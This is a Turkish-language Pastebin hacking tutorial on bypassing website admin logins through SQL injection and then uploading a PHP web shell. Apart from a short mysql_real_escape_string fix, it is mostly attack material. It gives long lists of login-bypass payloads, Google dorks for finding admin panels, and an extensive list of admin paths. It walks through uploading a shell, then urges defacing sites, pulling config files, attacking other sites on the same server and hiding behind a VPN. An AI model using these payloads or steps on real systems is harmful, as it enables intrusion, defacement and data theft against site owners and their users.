Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQL Kimlik Doğrulamayla Yönetici Oturumu Açarak Panele Shell Yükleme
- Selamün Aleyküm Sayın Deccal.Org Halkı yine yeni bir Hacking Güvenlik Makalesiyle karşınızdayım. KingSkrupellos * Deccal.Org !
- Başlık =>
- Türkçe => SQL Kimlik Doğrulamayla Yönetici Oturumu Açarak Panele Shell Yükleme Resimli Anlatım
- İngilizce =>SQL Login Authentication Admin ByPass ile Panelden Shell Upload Vulnerability üzerine Geniş Anlatım
- Bugün size SQL Enjeksiyon İzin Olmayan Admin Panellerde Yöneticiyi Atlaymayı resimli bir şekilde elimizden geldiğince göstermeye çalışacağım.
- [img]http://i.resimyukle.xyz/eHN3.png[/img]
- Ek Bilgi Vermek istiyorum =>
- Genelde Windows sunucularında çalışan Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir.
- Microsoft Access ve MsSQL veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır. Bu saldırı PHP tabanlı MySQL veritabanı kullanan siteler içinde geçerlidir.
- Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir.
- Amaç =>Yani PHP/ Microsoft yapısında SQL Query'de değişiklik yaparak sisteme dalmaktır :)
- Sql Command Injection ile entegre çalışıyorda diyebilirim :)
- Aynı yazıları birkaç kez yazmış gibi olucam ama kafanıza bu bilgileri iyice sokucam ki öğrenesiniz mantığını hıamına :D
- PHP yapılanmasında böyle bir hata olduğunu varsayarsak => Açık burdan dolayı kaynaklanır :)
- [code]<?php
- $sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $POST_['password'] . "'";
- response = mysql_query($sql);
- ?>[/code]
- MySQL Query dilinde yukarıdaki yazdığım şu demek oluyor =>
- [code]SELECT * FROM users WHERE user='' AND password='' < [/code]
- demek istediğim ise şu =>
- [code]Username=’admin’ AND Password=” OR ‘a’ = ‘a’ <[/code]
- ifadesi
- kullanıcı adı ve şifrenin doğru olduğunu gösteriyor. Sağlama yapmış olduk anlıyacağınız :)
- Yani Hedefsitemizde Panele şifresiz giriş yapmış olduk =>
- HEDEFSITE/administrator
- K. Adı => admin
- Şifre => ŞİFRESIZ GİRİŞ
- Peki SQL Login Authorized ByPass açığı nasıl kapatılır ? Hemen göstereyim =>
- \x00, \n, \r, \, ' bu ve bune benzer PHP kodlamalarındaki yazıları silmemiz gerekiyor.
- Internette '' mysql_real_escape_string '' kelimeleri diye aratırsanız karşınıza bir sürü ingilizce yazı çıkar.
- [code]<?php
- $username = mysql_real_escape_string($_POST["username"]);
- $password = mysql_real_escape_string($_POST["password"]);
- $sql = "SELECT * FROM users WHERE username='" . $username . "' AND password='" . $password . "'";
- $response = mysql_query($sql);
- ?>[/code]
- Soru => Yönetici Paneline Dalmak için SQL'de Yönetici Nasıl Atlatılır ?
- Cevap => SQL Injection Saldırısının en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici meta kodlarını yazarak panele giriş yapabilmektir.
- Amaç => Yönetici Paneline sanki Admin'miş gibi sisteme girmek ve Siteyi kendi isteğimiz üzerine kullanmak olucaktır.
- Şöyle Düşünelim SQL ( Structured Query Language ) Dilinde Sitede SQL yapısında Yönetici Bey kendisine ait k.adı ve şifre oluşturmuş.
- Ama bizim bunu şuan bilmemiz mümkün değil =>
- Kullanıcı => administrator
- Şifre => admin123456789
- diye oluşturduğunu varsayarsak =>
- [code]SELECT USER from database WHERE username=’administrator’ AND password=’admin123456789′ [/code]
- Peki Sql Login Authentication ByPass açığında Heykır abimiz sisteme nasıl dalar ?
- Sebebi => Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında hata oluşmasından dolayıdır.
- [code]SELECT USER from database WHERE username=’hi" or 1=1 --’ or 1=1– AND password=”hi" or 1=1 --[/code]
- Kullanıcı Adı => hi" or 1=1 --
- Şifre => hi" or 1=1 --
- olarak belirlemiş olduk.
- Ve Sisteme Güvenli bir şekilde girmiş olduk.
- Not => Bu arada VPN ( IP Adres Değiştirici ) tarayıcı eklentilerini kullanmayıda unutmayın. Gafil avlanmayın yani.
- Şimdi ise SQL Enjeksiyon Login Atlatmadaki Hileler =>
- Mantık kısmı burası işte =>
- Yani name ve password kısmında yerleri HEDEFSITE/adminpanel.php yolunda yazdığımızı düşünelim =>
- K. Adı => tom
- Şifre => or 1='1
- ile Admin Paneline girmiş olucaz :)
- [code]1) SELECT * FROM users
- WHERE name='tom'
- and password='tom'
- 2) SELECT * FROM users
- WHERE name='tom'
- and password='' or '1'='1'
- 3) SELECT * FROM users
- WHERE name='tom'
- and password='' or 1='1'
- 4) SELECT * FROM users
- WHERE name='tom'
- and password='' or 1=1-- -'
- 5) SELECT * FROM users
- WHERE name='' or '1'='1'
- and password='' or '1'='1'
- 6) SELECT * FROM users
- WHERE name='' or ' 1=1'
- and password='' or ' 1=1'
- 7) SELECT * FROM users
- WHERE name='1' or 1=1 -- -' [/code]
- Peki SQL Login Authentication ByPass açığı nasıl ve nerden kaynaklanır ?
- Kullanıcı => uname
- Şifre => passwrd
- olduğunu PHP kodunda düşünürsek =>
- [code]$uname=$_POST['uname'];
- $passwrd=$_POST['passwrd'];
- $query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";
- $result=mysql_query($query);
- $rows = mysql_fetch_array($result);
- if($rows)
- {
- echo "Başarıyla Giriş Yaptınız - KingSkrupellos Deccal.Org" ;
- create_session();
- }
- else
- {
- Echo "Şansına küs bir sonraki sefere yeniden dene";
- }[/code]
- Şimdi Hedef Belirlediğimiz Sisteme Aşağdaki verdiğim kodları baz alarak giriş yapmayı adım adım takip edin =>
- ' or ''='
- ' or ''='
- 1) select username,pass from users where username='' or ''='' and password='' or ''='' limit 0,1;
- 2) select username,pass from users where username='' or true--' and password='' or ''='' limit 0,1;
- 3) select username,pass from users where username='' or true;
- 4) select username,pass from users where username=('$username') and password=('$passwrd') limit 0,1;
- burda SQL Injection ByPass olmaya başladı bile => hemen denemesine geçelim =>
- ') or true--
- ') or ('')=('
- ') or 1--
- ') or ('x')=('
- 5) select username,pass from users where username="$username" and password="$passwrd" limit 0,1;
- " or true--
- " or ""="
- " or 1--
- " or "x"="
- 6) select username,pass from users where username=("$username") and password=("$passwrd") limit 0,1;
- ") or true--
- ") or ("")=("
- ") or 1--
- ") or ("x")=("
- 7) select username,pass from users where username=(('$username')) and password=(('$passwrd')) limit 0,1;
- ')) or true--
- ')) or ((''))=(('
- ')) or 1--
- ')) or (('x'))=(('
- Ve en sonunda Admin Paneline giriş yapmayı başardık. Ve Yönetici Panelinde Dosya Editleme - Dosya Yükleme - Kodları düzenleyip
- indeximizde çakarız. Shell yükleyip serverdaki aynı IP adresindeki diğer sitelere kolayca ulaşabiliriz :)
- HEDEFSITE/adminlogin.asp
- olduğunu düşünürsek
- Kullanıcı Adı => ')) or (('x'))=(('
- Şifre => ')) or (('x'))=(('
- Peki aklınızdaki en ufak soruyu tahmin edebiliyorum =>
- Peki bu SQL Inj Dorkunu nasıl bulabilirim usta KingSkrupellos diyeceksiniz şimdi ?
- Basit bir şekilde hemen bir Google Dork oluşturdum =>
- [code]inurl:admin/index.php
- inurl:administrator.php
- inurl:administrator.asp
- inurl:login.asp
- inurl:login.aspx
- inurl:login.php
- inurl:admin/index.php
- inurl:adminlogin.aspx[/code]
- Aşağıda verdiğim special karekterleri, bulduğumuz yönetici panelini dizine hem Kullanıcı Adına hemde Şifreye aynısını girdiğimiz vakit paneldeyiz demektir.
- ASP Siteler için SQL Injection Login Bypass =>
- [hide][code]' or '1'='1
- ' or 'x'='x
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- 'or'1=1'
- ==
- and 1=1--
- and 1=1
- KingSkrupellos - Deccal.Org
- ' or 'one'='one--
- ' or 'one'='one
- ' and 'one'='one
- ' and 'one'='one--
- 1') and '1'='1--
- admin' --
- admin' #
- admin'/*
- or 1=1--
- or 1=1#
- or 1=1/*
- ) or '1'='1--
- ) or ('1'='1--
- ' or '1'='1
- ' or 'x'='x
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- KingSkrupellos - Deccal.Org
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- 'or'1=1'
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- KingSkrupellos - Deccal.Org
- admin') or '1'='1'/*
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- ' or 0=0 --
- admin
- ' or '1'='1
- ' or 1='1
- 1' or 1=1 -- -
- ' or '1'='1
- ' or ' 1=1
- 1' or 1=1 -- -
- ' or ' 1=1
- anything' OR 'x'='x[/code]
- Diğer bana ait Login Atlatma Kodları =>
- [code]'-'
- ' '
- '&'
- '^'
- '*'
- ' or ''-'
- ' or '' '
- ' or ''&'
- ' or ''^'
- ' or ''*'
- "-"
- " "
- "&"
- "^"
- "*"
- " or ""-"
- " or "" "
- " or ""&"
- " or ""^"
- " or ""*"
- or true--
- " or true--
- ' or true--
- ") or true--
- ') or true--
- ' or 'x'='x
- ') or ('x')=('x
- ')) or (('x'))=(('x
- " or "x"="x
- ") or ("x")=("x
- ")) or (("x"))=(("x
- ' OR 'a' = 'a
- '-'
- ' '
- '&'
- '^'
- '*'
- ' or ''-'
- ' or '' '
- ' or ''&'
- ' or ''^'
- ' or ''*'
- "-"
- " "
- "&"
- "^"
- "*"
- " or ""-"
- " or "" "
- " or ""&"
- " or ""^"
- " or ""*"
- or true--
- " or true--
- ' or true--
- ") or true--
- ') or true--
- ' or 'x'='x
- ') or ('x')=('x
- ')) or (('x'))=(('x
- " or "x"="x
- ") or ("x")=("x
- ")) or (("x"))=(("x
- ''Or'='Or''
- 1'or'1'='1
- ' or 1=1 or ''='
- " or 1=1 or ""="
- ' OR ''='
- '' OR ''=''
- 'OR''='
- hey' or 1=1–
- ''Or 1 = 1'
- ' or 1=1--
- or 1=1--
- " or 1=1--
- or 1=1--
- ' or 'a'='a
- " or "a"="a
- ') or ('a'='a
- hi") or ("a"="a
- 'hi' or 'x'='x';
- x' or 1=1 or 'x'='y
- \x27\x4F\x52 SELECT *
- \x27\x6F\x72 SELECT *
- 'or select *
- admin'--
- ")) or (("x"))=(("x
- " or ""+"
- admin"or 1=1 or ""="
- admin") or ("1"="1"--[/code]
- Örnek Admin Panel Uzantıları =>
- [code]/login/web_manage.asp
- /login-admin.asp
- /adminlogin.asp
- /admin/adminLogin.asp
- /admin/login.php
- /admin/login.asp
- /admin/login.aspx
- /admin/login.html
- /admin
- /yonetim
- /panel
- /kontrolpanel
- /administrator
- /giris
- /login
- /superadmin
- /controlpanel
- /yonetici
- /giris.asp
- /yonetim.asp
- /login.asp
- /yonetici.asp
- /panel.asp
- adm
- admincp
- admcp
- cp
- modcp
- moderatorcp
- adminare
- admins
- admin1.php
- admin1.html
- admin2.php
- admin2.html
- yonetim.php
- yonetim.html
- yonetici.php
- yonetici.html
- ccms/
- ccms/login.php
- ccms/index.php
- maintenance/
- webmaster/
- adm/
- configuration/
- configure/
- websvn/
- admin/
- admin/account.php
- admin/account.html
- admin/index.php
- admin/index.html
- admin/login.php
- admin/login.html
- admin/home.php
- admin/controlpanel.html
- admin/controlpanel.php
- admin.php
- admin.html
- administrator/
- administrator/index.html
- administrator/index.php
- administrator/login.html
- administrator/login.php
- administrator/account.html
- administrator/account.php
- administrator.php
- administrator.html
- login.php
- login.html
- modelsearch/login.php
- moderator.php
- moderator.html
- moderator/login.php
- moderator/login.html
- moderator/admin.php
- moderator/admin.html
- moderator/
- account.php
- account.html
- admincontrol.php
- admincontrol.html
- adminpanel.php
- adminpanel.html
- admin1.asp
- admin2.asp
- yonetim.asp
- yonetici.asp
- admin/account.asp
- admin/index.asp
- admin/login.asp
- admin/home.asp
- admin.asp
- administrator/index.asp
- administrator/login.asp
- administrator/account.asp
- administrator.asp
- login.asp
- modelsearch/login.asp
- moderator.asp
- moderator/login.asp
- moderator/admin.asp
- account.asp
- controlpanel.asp
- admincontrol.asp
- adminpanel.asp
- fileadmin/
- fileadmin.php
- fileadmin.asp
- fileadmin.html
- administration/
- administration.php
- administration.html
- sysadmin.php
- sysadmin.html
- phpmyadmin/
- myadmin/
- sysadmin.asp
- sysadmin/
- ur-admin.asp
- ur-admin.php
- ur-admin.html
- ur-admin/
- Server.php
- Server.html
- Server.asp
- Server/
- wp-admin/
- administr8.php
- administr8.html
- administr8/
- administr8.asp
- webadmin/
- webadmin.php
- webadmin.asp
- webadmin.html
- administratie/
- admins/
- admins.php
- admins.asp
- admins.html
- administrivia/
- Database_Administration/
- WebAdmin/
- useradmin/
- sysadmins/
- admin1/
- system-administration/
- administrators/
- pgadmin/
- directadmin/
- staradmin/
- ServerAdministrator/
- SysAdmin/
- administer/
- LiveUser_Admin/
- sys-admin/
- typo3/
- panel/
- cpanel/
- cPanel/
- cpanel_file/
- platz_login/
- rcLogin/
- blogindex/
- formslogin/
- autologin/
- support_login/
- meta_login/
- manuallogin/
- simpleLogin/
- loginflat/
- utility_login/
- showlogin/
- memlogin/
- members/
- login-redirect/
- sub-login/
- wp-login/
- login1/
- dir-login/
- login_db/
- xlogin/
- smblogin/
- customer_login/
- UserLogin/
- login-us/
- acct_login/
- admin_area/
- bigadmin/
- project-admins/
- phppgadmin/
- pureadmin/
- sql-admin/
- radmind/
- openvpnadmin/
- wizmysqladmin/
- vadmind/
- ezsqliteadmin/
- hpwebjetadmin/
- newsadmin/
- adminpro/
- Lotus_Domino_Admin/
- bbadmin/
- vmailadmin/
- Indy_admin/
- ccp14admin/
- irc-macadmin/
- banneradmin/
- sshadmin/
- phpldapadmin/
- macadmin/
- administratoraccounts/
- admin4_account/
- admin4_colon/
- radmind-1/
- Super-Admin/
- AdminTools/
- cmsadmin/
- SysAdmin2/
- globes_admin/
- cadmins/
- phpSQLiteAdmin/
- navSiteAdmin/
- server_admin_small/
- logo_sysadmin/
- server/
- database_administration/
- power_user/
- system_administration/
- ss_vms_admin_sm/
- adminarea/
- bb-admin/
- adminLogin/
- panel-administracion/
- instadmin/
- memberadmin/
- administratorlogin/
- admin/admin.php
- admin_area/admin.php
- admin_area/login.php
- siteadmin/login.php
- siteadmin/index.php
- siteadmin/login.html
- admin/admin.html
- admin_area/index.php
- bb-admin/index.php
- bb-admin/login.php
- bb-admin/admin.php
- admin_area/login.html
- admin_area/index.html
- admincp/index.asp
- admincp/login.asp
- admincp/index.html
- webadmin/index.html
- webadmin/admin.html
- webadmin/login.html
- admin/admin_login.html
- admin_login.html
- panel-administracion/login.html
- nsw/admin/login.php
- webadmin/login.php
- admin/admin_login.php
- admin_login.php
- admin_area/admin.html
- pages/admin/admin-login.php
- admin/admin-login.php
- admin-login.php
- bb-admin/index.html
- bb-admin/login.html
- bb-admin/admin.html
- admin/home.html
- pages/admin/admin-login.html
- admin/admin-login.html
- admin-login.html
- admin/adminLogin.html
- adminLogin.html
- home.html
- rcjakar/admin/login.php
- adminarea/index.html
- adminarea/admin.html
- webadmin/index.php
- webadmin/admin.php
- user.html
- modelsearch/login.html
- adminarea/login.html
- panel-administracion/index.html
- panel-administracion/admin.html
- modelsearch/index.html
- modelsearch/admin.html
- admincontrol/login.html
- adm/index.html
- adm.html
- user.php
- panel-administracion/login.php
- wp-login.php
- adminLogin.php
- admin/adminLogin.php
- home.php
- adminarea/index.php
- adminarea/admin.php
- adminarea/login.php
- panel-administracion/index.php
- panel-administracion/admin.php
- modelsearch/index.php
- modelsearch/admin.php
- admincontrol/login.php
- adm/admloginuser.php
- admloginuser.php
- admin2/login.php
- admin2/index.php
- adm/index.php
- adm.php
- affiliate.php
- adm_auth.php
- memberadmin.php
- administratorlogin.php
- admin/admin.asp
- admin_area/admin.asp
- admin_area/login.asp
- admin_area/index.asp
- bb-admin/index.asp
- bb-admin/login.asp
- bb-admin/admin.asp
- pages/admin/admin-login.asp
- admin/admin-login.asp
- admin-login.asp
- user.asp
- webadmin/index.asp
- webadmin/admin.asp
- webadmin/login.asp
- admin/admin_login.asp
- admin_login.asp
- panel-administracion/login.asp
- adminLogin.asp
- admin/adminLogin.asp
- home.asp
- adminarea/index.asp
- adminarea/admin.asp
- adminarea/login.asp
- panel-administracion/index.asp
- panel-administracion/admin.asp
- modelsearch/index.asp
- modelsearch/admin.asp
- admincontrol/login.asp
- adm/admloginuser.asp
- admloginuser.asp
- admin2/login.asp
- admin2/index.asp
- adm/index.asp
- adm.asp
- affiliate.asp
- adm_auth.asp
- memberadmin.asp
- administratorlogin.asp
- siteadmin/login.asp
- siteadmin/index.asp
- ADMIN/
- paneldecontrol/
- login/
- cms/
- admon/
- ADMON/
- administrador/
- ADMIN/login.php
- panelc/
- ADMIN/login.html
- admin.
- login.htm
- login.
- admin/login.htm
- admin/home.
- admin/controlpanel.htm
- admin/cp.
- KingSkrupellos - Deccal.Org
- admin/adminLogin.htm
- admin/admin_login.
- admin/controlpanel.
- admin/admin-login.
- admin-login.
- admin/account.
- admin/admin.
- admin.htm
- adminitem/
- adminitem.
- adminitems/
- adminitems.
- administrator/login.
- administrator.
- administration.
- adminlogin.
- admin_area/admin.
- admin_area/login.
- manager/
- manager.
- letmein/
- letmein.
- superuser/
- superuser.
- access/
- access.
- sysadm/
- sysadm.
- superman/
- supervisor/
- panel.
- control/
- control.
- member/
- member.
- members.
- user/
- user.
- cp/
- uvpanel/
- manage/
- manage.
- management/
- management.
- signin/
- signin.
- log-in/
- log-in.
- log_in/
- log_in.
- sign_in/
- sign_in.
- sign-in/
- sign-in.
- users/
- users.
- accounts/
- KingSkrupellos
- accounts.
- bb-admin/login.
- bb-admin/admin.
- administrator/account.
- relogin.htm
- relogin.html
- check.
- relogin.
- blog/wp-login.
- user/admin.
- users/admin.
- registration/
- processlogin.
- checklogin.
- checkuser.
- checkadmin.
- isadmin.
- authenticate.
- authentication.
- auth.
- authuser.
- authadmin.
- cp.
- modelsearch/login.
- moderator.
- controlpanel.
- admincontrol.
- adminpanel.
- fileadmin.
- sysadmin.
- admin1.
- admin1.htm
- admin2.
- yonetim.
- yonetici.
- Deccal.Org
- ur-admin.
- Server.
- administr8.
- webadmin.
- admins.
- adm.
- admin_login.
- panel-administracion/login.
- pages/admin/admin-login.
- pages/admin/
- acceso.
- admincp/login.
- admincp/
- admincontrol/
- affiliate.
- adm_auth.
- memberadmin.
- administratorlogin.
- modules/admin/
- administrators.
- siteadmin/
- siteadmin.
- adminsite/
- kpanel/
- vorod/
- vorod.
- vorud/
- vorud.
- adminpanel/
- PSUser/
- secure/
- webmaster.
- autologin.
- userlogin.
- admin_area.
- cmsadmin.
- KingSkrupellos
- security/
- usr/
- root/
- secret/
- admin/login.
- admin/adminLogin.
- moderator/login.
- moderator/admin.
- 0admin/
- 0manager/
- aadmin/
- cgi-bin/login
- login1
- login_admin/
- login_admin
- login_out/
- login_out
- login_user
- loginerror/
- loginok/
- loginsave/
- loginsuper/
- loginsuper
- login
- logout/
- logout
- secrets/
- super1/
- super1
- super_index
- super_login
- supermanager
- superman
- superuser
- supervise/
- supervise/Login
- super[/code][/hide]
- Şimdi gelelim Dananın kuyruğunun koptuğu yire ahaha hıamına :D Aşağıda Resimlerle birlikte geniş bir şekilde anlattım :)
- Yani SQL Login Authentication Açığını iyice kavradıysanız ve mantığını anladiysanız SQL ile Shell Yükleme konusuna geçeceğim :)
- HEDEFSITE'mizi Dorklardan belirlediğimizi varsayalım :D
- Şöyle Olsun =>
- [code]HEDEFSITE/yoneticipaneliburadaaq/index.php[/code]
- Yukarıdaki SQL Loginlerden deneme yapıyoruz. Mesela bir tanesi dekkeldi ve panele girdik.
- [code]Kullanıcı Adı => ")) or (("x"))=(("x
- Şifre => ")) or (("x"))=(("x[/code]
- Sitenin Yönetici Panelinde biraz geziyoruz.
- Dosya Yükleyebileceğimiz yada .php dosya editleyebilecğimiz bir yer. Her ikiside Shell Yüklemeye izin verir yani
- Neyse ben File Upload buldum SQL açığıyla girdiğim sitede :)
- Konu Başlığını filen yazıyorum. deccal.php adlı shellimi siteye yüklüyorum. Siz istediğiniz şekilde shell dosyanınızı adlandırabilirsiniz.
- PC'niz Shell yüklemeye izin vermiyorsa Antivirüs Programınızın Dosya koruması ve Internet Koruması bölümünü devre dışı bırakın ve yükleyin.
- Ok. .php shell yüklendi. Şimdi sitenin neresini gittiği bulmak için => Duyurular bölümüne geliyorum. Download kısmına '' Bağlantıyı yeni sekmede açıyorum ''
- Aman Tanrım Didim. O da ne ? Bizim Shell yüklenmiş.
- Peki nerde mesela ;
- [code]HEDEFSITE/işte-yüklenen-shell-dizin-bölümü/deccal.php[/code]
- olsun ve aşağıda gördüğünüz gibi Shell'i görsel bir şekilde görüyorsunuz.
- Index basın. Config çekin. Mass Atın. Diğer IP'deki sitelere ulaşın. Artık gerisi size kalmış
- Olay işte bu kadar.
- Resimli Anlatım Aşağıda Verilmiştir ( Deccal.Org )
- [img]http://i.hizliresim.com/l3Z2AJ.jpg[/img]
- [img]http://i.hizliresim.com/VPD5jZ.jpg[/img]
- [img]http://i.hizliresim.com/njlVBV.jpg[/img]
- [img]http://i.hizliresim.com/vXPdqz.jpg[/img]
- [img]http://i.hizliresim.com/1VEmXj.jpg[/img]
- [img]http://i.hizliresim.com/LZD7Lo.jpg[/img]
- [img]http://i.hizliresim.com/r61B7m.jpg[/img]
- [img]http://i.hizliresim.com/77DE4Y.jpg[/img]
- Emeğe Saygı. Bu dökümanın tamamı '' KingSkrupellos - Deccal.Org '' aittir.
- Lütfen kaynak göstererek alıntı yapınız.
- Hacking ve Güvenlik konusunda bir sonraki makalede görüşmek üzere. Kendinize iyi bakın. Sağlıcakla kalın.
- #### Mr. KingSkrupellos - Deccal.Org Digital Security Technological Turkish Army ###
Advertisement
Add Comment
Please, Sign In to add comment